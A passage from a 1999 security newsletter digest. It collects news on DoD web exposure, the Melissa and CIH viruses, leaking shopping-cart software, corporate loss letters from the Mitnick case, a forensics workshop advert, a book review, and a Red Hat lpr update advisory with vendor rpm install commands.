of the recently formed Joint Task Force for Computer Network Defense.
Speaking at the AUSA/Old Crows conference, the Air Force's Campbell said
these attacks threaten DOD's "basic logistics systems which run on the
Internet."

Philip Loranger, a civilian Army official who works for the Army's
Campbell as chief of the service's Command and Control Protect Division,
said the number of publicly accessible Web sites the Army operates poses a
security risk. "We still have more public Web pages than necessary," he
said.


Loranger said the Army continues to shut down Web sites for security
reasons. He recently closed to the public the Army's information assurance
Web site. "In our zealousness to share information [with the American
public], we are disclosing targeting information" that a terrorist or
enemy state could use, Loranger said.

John Hamre, deputy secretary of Defense, sounded a cautionary note about
security vulnerabilities posed by the information posted on DOD Web sites
and the ability of hackers to exploit the connections. But he warned that
"we are far too connected to unplug ourselves [from the Web]."

Hamre added that the Pentagon made a mistake in turning control of its Web
activities over to its public relations department without considering
security risks. The Pentagon has made strides in the past two years in
terms of securing its critical information infrastructure, Hamre said.
"The foundation is in place, but it is a dramatically more complicated
problem."


Hamre believes that vendors' e-commerce practices present a scenario ripe
for exploitation.


"The best way to attack the U.S. is to become someone's customer," he
said. "They'll give you the software" to enter sensitive systems, with few
checks and balances imposed on the distribution or use of that software.

Tactical battlefield networks under development by the Army and Marines to
support operations on future digitized battlefields have vulnerabilities,
according to Maj. Gen. Robert Nabors, commander of the Army's
Communications-Electronics Command. Army tactical battlefield networks,
Nabors said, "do not have the bandwidth to handle commercial [information
assurance] tools."







-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

32.0 Digital Dicks
~~~~~~~~~~~~~

From: William Knowles <erehwon@kizmiaz.dis.org>


http://www.wired.com/news/news/technology/story/19191.html


Detectives in the Digital Age
3:00 a.m. 19.Apr.99.PDT


A computer virus writer with the stolen America Online user name "Sky
Roket" turns up on a computer bulletin board in Norway and is arrested in
New Jersey. A North Carolina computer engineer using an anonymous Web site
service is linked to a stock hoax in California.


Cybersleuths are catching perpetrators of hoaxes and malicious acts on the
Internet more quickly, helped by growing cooperation between the online
industry and law enforcement agents.


"We're getting past the age of denial," said Richard Powers of Computer
Security Institute in San Francisco. "People are realizing there's a
problem and that we have to work on it together."


But even after a string of high-profile takedowns of alleged Web
criminals, the security experts championed as the Sam Spades of the
digital age are warning about the future.


Computer crime is growing, and smart criminals are avoiding prosecution,
they say. Computer Security Institute surveys show that over the past
year, "online intrusions" doubled as a percentage of computer crime.


The reason it's happening, say the computer experts, is "that's where the
money is."


"Now that e-commerce is coming online and getting bigger and bigger, the
fraud and criminal activity that used to be committed with fax and phone
is moving onto the Internet," said George Vinson, a former FBI cybercrime
unit member who is now with Deloitte & Touche's computer security
practice.


The experts say their search for perpetrators has gotten a boost from some
less-than-clever methods used by hackers and hoaxters.


For example, David Smith, the 30-year-old New Jersey man charged with
creating Melissa "actually signed his name to some of the online documents
he created," noted Richard Smith, the Cambridge, Massachusetts-based
cybersleuth who was credited with the key breaks in cracking the Melissa
case.


The Melissa virus disrupted and crashed some e-mail and computer networks
at thousands of companies and government agencies by overloading their
systems. Smith, who was charged last week with violating an array of New
Jersey computer laws, faces up to US$480,000 in fines if convicted.


Cyberleuth Smith, who works for software company Phar Lap, found clues
when he tracked the online postings linked to the suspect.


"David Smith was a very good macro virus writer, but not a terribly good
hacker," said security expert Michael Zboray of Gartner Group. "He could
have done a much better job of covering his path. The next time this
happens it might not be so easy."


Perpetrators of cybercrimes have felt safe in the anonymity of cyberspace.
But Internet service providers are growing more eager to hand over user
logs in criminal investigations. And investigators are becoming better at
searching the scenes of virtual crimes for clues to a perpetrator's
identity.


[snip...]



-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

33.0 Spooktech99
~~~~~~~~~~~

Forwarded From: "Noonan, Michael D" <michael.d.noonan@intel.com>


>From Spyking's newsletter...


SpookTech 99 - The Digital Detective Workshop


It's that time again... The 3rd Annual SpookTech Conference...


This years theme is "The Digital Detective"...


Digital Evidence Acquisition tools & techniques will be demonstrated
in this "hands-on" computer investigations training seminar...


What we'll cover:


Types of Computer Crime
Cyber Law Basics


How to Bypass Passwords
How to Crack Encrypted Files


How to Trace the Source of E-Mail
How to Track a Suspect Online
How to Track Online Activity
How to Track Software Piracy


How to Match a Diskette to a PC
How to Recover Deleted Data
Data Hiding Techniques
Text Search Techniques


Finding Disguised and Hidden Images
How to Find Unique Identifiers in Documents


How to Remotely Monitor a Target PC
How to Find Clandestine Web Sites
Social Engineering in Chat Rooms
Types of Investigative Software


Actual "Hands-On" Demonstrations of the latest
High-Tech Evidence Gathering Software


If you are in the business, you'll be amazed at some
of the products we'll showcase...


If you're interested in speaking or exhibiting your products
let me know...


Much more to be added...


Don't Miss SpookTech 99 - The Digital Detective Workshop!
June 1999 New York


Each Participant will receive a CD-ROM with a demonstration copy
of all software and PowerPoint presentations used during the seminar.


Each Participant will receive a Certificate of Attendance


Checkout: <http://www.codexdatasystems.com/ddw.html>


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

34.0 [ISN] review:"Ethical and Social Issues in the Information Age", Joseph Migga Kizza,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


0387982752.RVW 990308


"Ethical and Social Issues in the Information Age", Joseph Migga Kizza,
0-387-98275-2, U$42.95


%A Joseph Migga Kizza
%C Springer-Verlag New york, Inc., 175 Fifth Avenue, New York, NY 10010
%D 1998
%E D. Gries, F.B. Schneider
%G 0-387-98275-2
%I Springer
%O U$49.99
%P 172 p.
%T "Ethical and Social Issues in the Information Age: Undergraduate
Texts in Computer Science"


Overview: "Ethical and Social Issues in the Information Age" is an
excellent foundation and resource for defining ethics and morals in a
technological world. For any reader interested in exploring this often
shady area of life, I highly recommend this be your introduction. Along
with the clear and concise defintions, each chapter references real world
examples to help illustrate each point and make the reader aware of the
real and imaged concerns associated with each.


Chapter 1 - "Morality and the Law": If you can judge a book by the first
chapter, this book is a great read. The introduction to morality and the
law starts out with clear explanation of what morality is, moral theories,
moral decision making, as well as listing well established and general
moral codes (such as 'the golden rule'). By defining such concepts as
'guilt' and 'judgment', the reader is well equipped to move on and explore
the different facets of ethics, morals, and how they apply to technology.


Chapter 2 - "Ethics, Technology, and Values": The various definitions of
ethics and the theories of ethics is explained very well. Providing short
descriptions of major ethical theories, you begin to realize there are
many more concerns than may meet the eye. Continuing on, Kizza creates an
equation to explore the relation between ethics and the human mind. This
chapter also goes in depth on Codes of Ethics, defines Computer Ethics,
and explains *why* you should study Computer Ethics.


Chapter 3 - "Ethics and the Professions": Chapter three delves into
defining professional requirements and the codes that may apply to them.
Kizza describes four codes: professional, personal, institutional, and
community. From here, the four 'pillars' of professionalism are outlined
and described: Commitment, integrity, responsibility, and accountability.
The rest of this chapter deals with the making of an ethical profession,
and the attributes that go with it.


Chapter 4 - "Anonymity, Security, and Privacy": After defining each of
these concepts, real world examples are provided to illustrate each, and
help show the reason each is valuable and noteworthy. Perhaps the
strongest point is the defintion and breakout of 'privacy', and what it
truly entails.


Chapter 5 - "Intellectual Property Rights and Computer Technology": Before
you can define intellectual property rights, you must qualify what
property is in the technical and digital world. Once defined, there are
several factors that affect the value and right of use including 'public
domain', copyright, patents, 'trade secret' status, trademarks, and more.
Last, you must define ownership as well as define what infringement really
is. This chapter also goes into how you can better protect what is
valuable to you or your company.


Chapter 6 - "Computer-Augmented Environments: The Workplace": A few years
ago, the 'workplace' was easily defined by four walls in a set location.
In today's world, travelling, home and virtual offices have replaced that
idea. Chapter six defines this changing world and considers the effects
and benefits of each. Section 6.4 goes into explicit detail about the
implications and considerations of workplace privacy and surveillance. How
do you monitor virtual workers? What rights do you have to monitor home
activity?


Chapter 7 - "Software Issues": Since software in one form or another
controls every computer or computer component, it becomes a more important
and fundamental part of our life. Even though we may not understand the
languages that make up the software, we must be aware of the elements of
software that affect its use. Verification and Validation, reliability,
security, safety, and quality are some of the major points examined and
brought to light. Section 7.2 delves into the various reasons of why
software fails and who is responsible. More importantly, it covers what
consumer protection exists, the rights of software buyer's, and more.


Chapter 8 - "New Frontiers for Ethical Considerations: Artifical
Intelligence, Cyberspace, and Virtual Reality": Most literature on future
concepts in computing typically lack material justifying one stance or
another. This book differs as it provides solid definitions of areas of
computers barely defined, and more importantly, provides reference to
existing work in the fields of AI and VR.


Chapter 9 - "Ethical and Social Issues in Cyberspace": Perhaps one of the
most obscured and widely (mis?)used words to describe computer culture is
'cyberspace'. Rather than try to force an unwieldy definition on the word,
Kizza gives the reader a foundation and quick background for the word.
That in mind, he moves on to cover the role of copyright, patents,
identity, censorship, privacy, and security and how they are affected, as
well as how they affect cyberspace.





-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

35.0 Update your AV software!, CIH to hit April 26th...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Erik Parker <netmask@303.org>


http://www.wired.com/news/print_version/technology/story/19280.html?wnpg=all
2:30 p.m. 22.Apr.99.PDT


The havoc caused by the Melissa computer virus is tame compared with the
destruction expected to strike on 26 April.


The CIH virus is believed to be the first virus to attack a PC's BIOS
(basic input/output system), the built-in program that helps a machine
boot. The virus can overwrite hard drives, and because it has a long
incubation period it is now believed to be widely distributed.


"It's the most destructive [code] out there," said Roger Thompson,
technical director of malicious code research at ICSA, an independent
security assurance service that certifies antivirus software.


"I think it's pretty bloody important," Thompson said. "We never release
warnings about viruses because we don't want to hype them, but we issued a
release about this one."


Affecting Windows 95, 98, and NT machines, the virus first appeared last
spring. Since then, it has spread widely, hidden in software installers on
CD-ROMs and floppy disks, in email attachments, and in infected software
shared by computer users, Thompson said.


The virus is a Windows executable, or .exe, file that, when launched, sits
dormant on an infected machine until it drops its "payload." That's
expected to happen on Monday.


The payload may overwrite the system's hard drive, erasing everything on
it. The virus may also attack the portion of the machine's BIOS that
affects the start-up sequence, making the computer unusable.


However, due to the wide variety of different system designs, virus
experts can only guess how many machines will be affected.


Though the virus is not irreversible, experts said that resetting the BIOS
is a major pain in the neck that's beyond the expertise of most computer
dealers, let alone average users.


"It's been out there spreading for some time now," said David Chess, a
member of the researcher staff at IBM's High Integrity Computing Lab in
the Thomas J. Watson Research Center. "It's reached the stage where it's
endemic."


In fact, the CIH virus was found on a batch of IBM Aptivas earlier this
month, forcing Big Blue to issue a warning to thousands of customers.


The CIH virus is version 1.2, a variant of the equally destructive
Win95-CIH virus, which is timed to strike on the 26th of every month.
Described when it appeared last spring as the mother of all viruses
because of its destructive behavior, the Win95-CIH virus failed to live up
to the hype because of its relative rarity.


ICSA's Thompson counseled users to leave email attachments unopened on
Monday and to run an updated antivirus program. Because the virus has been
in circulation for a long time, almost all antivirus software can detect
it.


In fact, Thompson said that CIH's impact may have already been lessened by
users running antivirus software to check for Melissa.



-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

36.0 [ISN] More problems with online stores...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: 7Pillars Partners <partners@sirius.infonex.com>


Card numbers, other details easily available at online stores
6.38 a.m. ET (1039 GMT) April 22, 1999

FOOTNOTE: LOS ANGELES (AP) There are gaping holes in the security webs of
more than 100 small Internet retailers, allowing anyone with a little
computer savvy to obtain shoppers' credit card numbers and other personal
information, a technician warned.

The retail sites, and probably hundreds more, incorrectly installed
"shopping cart'' software that is used to take customer orders, leaving
confidential material in files that virtually anyone can find with a World
Wide Web search engine, said Joe Harris, a computer technician at
Seattle-based Blarg Online Services, an Internet service provider.

"There are inexperienced Web site developers out there who don't know how
to set up an online store safely, but they don't tell their clients,''
Harris said Wednesday.

Harris said he found the problem while reviewing an online store hosted by
his service.

The Los Angeles Times reported today that it managed to download more than
100 pages of credit card numbers, travel reservations, e-mail and other
information from Internet sites.

Among the computer programs that are vulnerable include those from Order
Form, Seaside Enterprises, QuikStore, PDGSoft and Mercantec.

QuikStore said only two of its estimated 700 users have reported problems
with the shopping carts.

"It's not necessarily their fault,'' said Dwight Vietzke, a spokesman for
QuikStore. "These are things that fall through the cracks.''



-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA
37.0 Mitnick Documents exposed..
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mitnick Documents Exposed


contributed by Emmanuel Goldstein
Date: 4/23/99 07:45
Received: 4/23/99 07:55
From: Emmanuel Goldstein, emmanuel@2600.com
To: undisclosed-recipients:;

2600 has obtained the letters sent to the FBI that were
used to help calculate "damages" caused by Kevin
Mitnick. The following letters can be thought of as the
main reasons why Kevin was able to be held without bail
for so long and will no doubt be used at his sentencing
on June 14 to impose more harsh conditions.

As far as we know, no mention of any of these "losses"
was ever made to any of the stockholders of these
companies, which to our understanding they are
required to do if losses of this magnitude actually took
place.

We're making these public because the public needs to
know how individuals can be locked away for so long
just for pissing off powerful corporations. We believe
this also demonstrates how the FBI prodded these
companies into giving as inflated a figure as possible.

Happy reading.

emmanuel

Sun Microsystems
2550 Garcia Avenue
Mountain View, CA 94043
415 960-1300
415 336-0630 fax

March 9, 1995

Kathleen Carson
Federal Bureau of Investigation
11000 Wilshire Boulevard, Suite 1700
Los Angeles, California 90024

Re: Sun Solaris 2.x

Dear Ms. Carson:

As you are aware, Sun Microsystems, Inc. experienced a break-in of
its computer systems located in our Los Angeles office on or about
June 30, 1993. During the break-in, a substantial portion of the
source code of Sun's Solaris 2.x software product was apparently
copied and removed.

Solaris software is a UNIX-based product originally licensed by
Sun from AT&T. In March of 1994 Sun bought out its original license
with AT&T with a lump sum payment of more than $80 million. In
addition, Sun has invested very heavily for more than ten years in
the continued development of the Solaris software and values the
current product in the hundreds of millions of dollars.

Sincerely,

Lee Patch
Vice President, Intellectual Property Law
LP/kl
Enclosure


------------------------------

NEC America, Inc.
1555 W. Walnut Hill Lane
Irving, Texas 75038-3796
Tel. 214-751-7000

March 9, 1995

Special Agent Kathleen Carson
Federal Bureau of Investigation
U.S. Department of Justice
11000 Wilshire Boulevard #1700
Los Angeles, CA 90024

Dear Ms. Carson:

Please be advised that the software stolen from NEC America, Inc.
and its affiliates involves the software design for a NEC cellular
mobile telephone and is valued at one million seven hundred fifty
thousand dollars ($1,750,000.00). The value is based on the
development costs for the stolen software.

Please contact me if I can be of any further assistance.

Sincerely,

Yutaka Ichikawa
Vice President & General Manager
Communications Terminals Group

------------------------------

Nokia Mobile Phones

Ilkka Roman
Deputy Security Manager
P.O. Box 86
FIN-24101 Salo
Finland
Telefax: +358 10 505 4303
Telephone: +358 10 505 5153
Mobile: +358 40 501 3773

To: FBI Los Angeles
Attn: SA Kathleen Antena [sic]
CC: Mr. Urho Ilmonen, Vice President, Legal
Fax: +1-310-9963836

Date: Sep. 20, 1996

Subject: ESTIMATED VALUE FOR SOFTWARE ASKED TO BE SENT

PRIVILEGED AND CONFIDENTIAL

Nokia Mobile Phones was requested and tried to be mislead in early
1994 to send whole material of HD760 project on magnetic tape from
Oulu to US as guided by the requesting person. We have estimated
the value of the asked material to be:
2.5 M FIM
which is according to the current rating (1 US $ = 4.48 FIM)
560,000 US $

This estimation is based on amount of work done to create the
material of that project plus additional overhead caused by type
approval and other featured necessary to finish the product.
v
Ilkka Roman
NMP Security Deputy Security Manager

------------------------------

NOKIA Mobile Phones (UK) LTD

CONFIDENTIAL

Ms. Kathleen Carson
Special Agent
Federal Bureau of Investigation
11000 Wilshire Boulevard
Los Angeles, CA 90024
USA

February 23, 1995

Dear Ms. Carson:

Regarding your telephone request of 21 February 1995 asking for
Nokia to put a value on the costs of the software stolen, together
with an estimate of the costs of the disruption, I have provided
initial estimates of them for you as detailed below:

A rough estimate of the development costs of stolen software and
tools, including testing is US$ 7.5 Million.

The disruption to the Nokia Mobile Phones development community
caused by the incidents resulted in our local networks being
completely closed for a week and the external networks closed for
one month.

Lost development time is estimated to have cost the company US$
7.5 Million and probably a further US $120 Million in lost revenue
due to new developments being delayed in reaching the market.

There are some costs of disruption to our other divisions, Nokia
Research and Nokia Telecommunications, I have not yet been able to
ascertain estimates for those divisions. These could be provided in
due course.

This would lead to a minimum loss estimated to total US $135
Million. I hope that this information satisfies your needs.

Yours sincerely

John A. Talbot
Vice President of Engineering Support Centre

------------------------------

NOVELL

February 23, 1995

Cathleen Carson
(Via Fax 310-996-3359)
Special Agent FBI
11000 Wilshire Blvd
Suite 1700
Los Angeles, CA 90024

Dear Special Agent Carson,

Novell is greatly relieved that Kevin Mitnick has been
apprehended. As you know, several types of source code were taken
by Mitnick. To attach a value of the source code taken is a very
difficult thing to do, given that Novell's revenues exceed
$2,000,000,000/year. However, the cost associated with the
development of the source code is well in excess of $75,000,000.

A more precise number would require additional research. If you
have any questions, please contact me at 801-429-7888.

Sincerely,

Edward L. Morin
Corporate Security

------------------------------

Fujitsu

February 22, 1995

VIA FACSIMILE 310/996-3359 & U.S. MAIL

Kathleen Carson, Special Agent
Federal Bureau of Investigation
11000 Wilshire Boulevard
Los Angeles, California 90024

Re: Kevin Mitnick

Dear Kathleen:

Congratulations on the arrest of Kevin Mitnick. Pursuant to your
request, I asked our Cellular group to assess the damages caused to
Fujitsu Network Transmission Systems, Inc. ("FNTS") by Mitnick's
theft of the source code for the PCX telephone. The information
provided to me is as follows:

Software development expenses... $1,100,000.00
Research & development expenses.. 1,000,000.00
Total... $2,100,000.00

Additionally, attached is a worksheet showing what it would (will)
cost FNTS to recall the PCX phones in the marketplace if the source
code has been compromised or is not safe. Please call me at (214)
479-2931 if you need further information.

Very truly yours,

Melanie W. Scofield
Corporate Counsel

MWS/lm
Attachment

cc: George Banash

To: Nobuo Yamamolo PCX Recall Cost Analysis
COMPANY CONFIDENTIAL
Yoichiro Fujino
DO NOT RELEASE

PCX Recall for Software Rework

COST ITEMS-
DESCRIPTION PRICE COMMENT
REFERENCE
Shipping $17.31 Fed. Exp.=$7.50 X 2 + $2.31 (PACKAGE)B5
Pre-check $4.00 Bench test to confirm operational
status - 6 min. B6
Labor to upgrade software $8.50 15 min. $ 34.00 per hour B7
QC Cost $4.00 After repair QC check - 6 min. B8
Packing & Handling labor $6.40 Overhead cost to unpack & pack
and ticket - 9.6 min. B9
Customer Handling $15.00 Dealer, FASC, End-User
Compensation B10
PCX Admin Overhead $2.00 Mass Mailing, Accounting, Repair
Admin., Misc. B11

TOTAL $57.21 Total Cost per Recall Unit
SUM(B5:B11)

GRAND TOTAL $5,517,389.61 Total recall cost for 96,441 unit
population

Recall for source code rework. Based on population through
December 1994.






@HWA

38.0 New LPR package (linux)
~~~~~~~~~~~~~~~~~~~~~~~

Return-Path: <linux-security-request@redhat.com>
Resent-Date: 23 Apr 1999 19:00:16 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:15 1999
MBOX-Line: From yocum@fnal.gov Fri Apr 23 15:26:13 1999
Delivered-To: alex-alex@yuriev.com
Date: Fri, 23 Apr 1999 13:29:46 -0500
From: yocum@fnal.gov
Sender: yocum@sapphire.fnal.gov
To: linux-security@redhat.com
Message-id: <01JADHFMNA96000DXM@FNAL.FNAL.GOV>
Organization: Fermi National Accelerator Laboratories
MIME-version: 1.0
X-Mailer: exmh version 2.0zeta 7/24/97
Content-type: text/plain; charset=us-ascii
X-moderate: yes
Resent-Message-ID: <"9DvWk3.0.pI6._CC8t"@lists.redhat.com>
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/69
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Forw: new lpr package



This and the following 2 messages are from linux-watch@redhatc.com


Dan


___________________________________________________________________________
Dan Yocum | Phone: (630) 840-8525
Linux/Unix System Administrator | Fax: (630) 840-6345
Computing Division OSS/FSS | email: yocum@fnal.gov .~. L
Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I
P.O. Box 500 | // \\ N
Batavia, IL 60510 | "TANSTAAFL" /( )\ U
________________________________|_________________________________ ^`~'^__X_



------- Forwarded Message


Return-Path: redhat-announce-list-request@redhat.com
Received: from lists.redhat.com (lists.redhat.com [199.183.24.247])
by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19654
for <yocum@sapphire.fnal.gov>; Fri, 16 Apr 1999 04:2

  
6:46 -0500
Received: (qmail 11678 invoked by uid 501); 16 Apr 1999 09:44:16 -0000
MBOX-Line: From redhat-announce-list-request@redhat.com Fri Apr 16 05:44:13
1999
Resent-Date: 16 Apr 1999 09:44:12 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:44:12 1999
Date: Fri, 16 Apr 1999 05:20:28 -0400 (EDT)
From: Cristian Gafton <gafton@redhat.com>
X-Sender: gafton@alien.devel.redhat.com
To: redhat-watch-list@redhat.com
Subject: SECURITY: New lpr packages available
Message-ID: <Pine.LNX.4.10.9904160503450.29655-100000@alien.devel.redhat.com>
Approved: ewt@redhat.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Resent-Message-ID: <"cFsjk1.0.hn2.iPm5t"@lists.redhat.com>
Resent-From: redhat-watch-list@redhat.com
Reply-To: redhat-watch-list@redhat.com
X-Mailing-List: <redhat-watch-list@redhat.com> archive/latest/17
X-Loop: redhat-watch-list@redhat.com
X-URL: http://www.redhat.com
X-Loop: redhat-announce-list@redhat.com
Precedence: list
Resent-Sender: redhat-announce-list-request@redhat.com
X-URL: http://www.redhat.com


Security vulnerabilities have been found in the versions of lpr
that ship with Red Hat Linux. Thanks go to the Linux Security
Audit team for discovering the vulnerability. It is recommended
that all users of Red Hat Linux upgrade to the new packages.


Red Hat Linux 5.0,5.1,5.2:
==========================


alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/lpr-0.35-0.5.2.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/lpr-0.35-0.5.2.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/lpr-0.35-0.5.2.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/lpr-0.35-0.5.2.src.rpm



Red Hat Linux 4.2:
==================


alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/lpr-0.35-0.4.2.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/lpr-0.35-0.4.2.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/lpr-0.35-0.4.2.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/lpr-0.35-0.4.2.src.rpm


Cristian
- --
- ----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly. It's just selective about who its friends are.




- --
To unsubscribe: mail redhat-watch-list-request@redhat.com with
"unsubscribe" as the Subject.


- --
To unsubscribe:
mail -s unsubscribe redhat-announce-list-request@redhat.com < /dev/null



------- End of Forwarded Message




--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------


To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/nullReturn-Path: <linux-security-request@redhat.com>
Resent-Date: 23 Apr 1999 19:00:16 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:15 1999
MBOX-Line: From yocum@fnal.gov Fri Apr 23 15:26:13 1999
Delivered-To: alex-alex@yuriev.com
Date: Fri, 23 Apr 1999 13:29:46 -0500
From: yocum@fnal.gov
Sender: yocum@sapphire.fnal.gov
To: linux-security@redhat.com
Message-id: <01JADHFMNA96000DXM@FNAL.FNAL.GOV>
Organization: Fermi National Accelerator Laboratories
MIME-version: 1.0
X-Mailer: exmh version 2.0zeta 7/24/97
Content-type: text/plain; charset=us-ascii
X-moderate: yes
Resent-Message-ID: <"9DvWk3.0.pI6._CC8t"@lists.redhat.com>
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/69
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Forw: new lpr package



This and the following 2 messages are from linux-watch@redhatc.com


Dan


___________________________________________________________________________
Dan Yocum | Phone: (630) 840-8525
Linux/Unix System Administrator | Fax: (630) 840-6345
Computing Division OSS/FSS | email: yocum@fnal.gov .~. L
Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I
P.O. Box 500 | // \\ N
Batavia, IL 60510 | "TANSTAAFL" /( )\ U
________________________________|_________________________________ ^`~'^__X_



------- Forwarded Message


Return-Path: redhat-announce-list-request@redhat.com
Received: from lists.redhat.com (lists.redhat.com [199.183.24.247])
by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19654
for <yocum@sapphire.fnal.gov>; Fri, 16 Apr 1999 04:26:46 -0500
Received: (qmail 11678 invoked by uid 501); 16 Apr 1999 09:44:16 -0000
MBOX-Line: From redhat-announce-list-request@redhat.com Fri Apr 16 05:44:13
1999
Resent-Date: 16 Apr 1999 09:44:12 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:44:12 1999
Date: Fri, 16 Apr 1999 05:20:28 -0400 (EDT)
From: Cristian Gafton <gafton@redhat.com>
X-Sender: gafton@alien.devel.redhat.com
To: redhat-watch-list@redhat.com
Subject: SECURITY: New lpr packages available
Message-ID: <Pine.LNX.4.10.9904160503450.29655-100000@alien.devel.redhat.com>
Approved: ewt@redhat.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Resent-Message-ID: <"cFsjk1.0.hn2.iPm5t"@lists.redhat.com>
Resent-From: redhat-watch-list@redhat.com
Reply-To: redhat-watch-list@redhat.com
X-Mailing-List: <redhat-watch-list@redhat.com> archive/latest/17
X-Loop: redhat-watch-list@redhat.com
X-URL: http://www.redhat.com
X-Loop: redhat-announce-list@redhat.com
Precedence: list
Resent-Sender: redhat-announce-list-request@redhat.com
X-URL: http://www.redhat.com


Security vulnerabilities have been found in the versions of lpr
that ship with Red Hat Linux. Thanks go to the Linux Security
Audit team for discovering the vulnerability. It is recommended
that all users of Red Hat Linux upgrade to the new packages.


Red Hat Linux 5.0,5.1,5.2:
==========================


alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/lpr-0.35-0.5.2.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/lpr-0.35-0.5.2.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/lpr-0.35-0.5.2.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/lpr-0.35-0.5.2.src.rpm



Red Hat Linux 4.2:
==================


alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/lpr-0.35-0.4.2.alpha.rpm


i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/lpr-0.35-0.4.2.i386.rpm


sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/lpr-0.35-0.4.2.sparc.rpm


Source rpm:
rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/lpr-0.35-0.4.2.src.rpm


Cristian
- --
- ----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly. It's just selective about who its friends are.




- --
To unsubscribe: mail redhat-watch-list-request@redhat.com with
"unsubscribe" as the Subject.


- --
To unsubscribe:
mail -s unsubscribe redhat-announce-list-request@redhat.com < /dev/null



------- End of Forwarded Message




--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------


To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null

@HWA

39.0 New PROCMAIL package (linux)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Return-Path: <linux-security-request@redhat.com>
Resent-Date: 23 Apr 1999 19:00:39 -0000
Resent-Cc: recipient list not shown: ;
MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:37 1999
X-From_: linux-security-request@redhat.com Fri Apr 23 20:30:24 1999
Date: Fri, 23 Apr 1999 13:30:16 -0500
From: yocum@fnal.gov
Sender: yocum@sapphire.fnal.gov
To: linux-security@redhat.com
Cc: yocum@fnal.gov
Message-id: <01JADHG8E7XK000EP8@FNAL.FNAL.GOV>
Organization: Fermi National Accelerator Laboratories
MIME-version: 1.0
X-Mailer: exmh version 2.0zeta 7/24/97
Content-type: text/plain; charset=us-ascii
X-moderate: yes
Resent-Message-ID: <"xk2b_.0.RT6.LDC8t"@lists.redhat.com>
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/70
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Forw: new procmail package




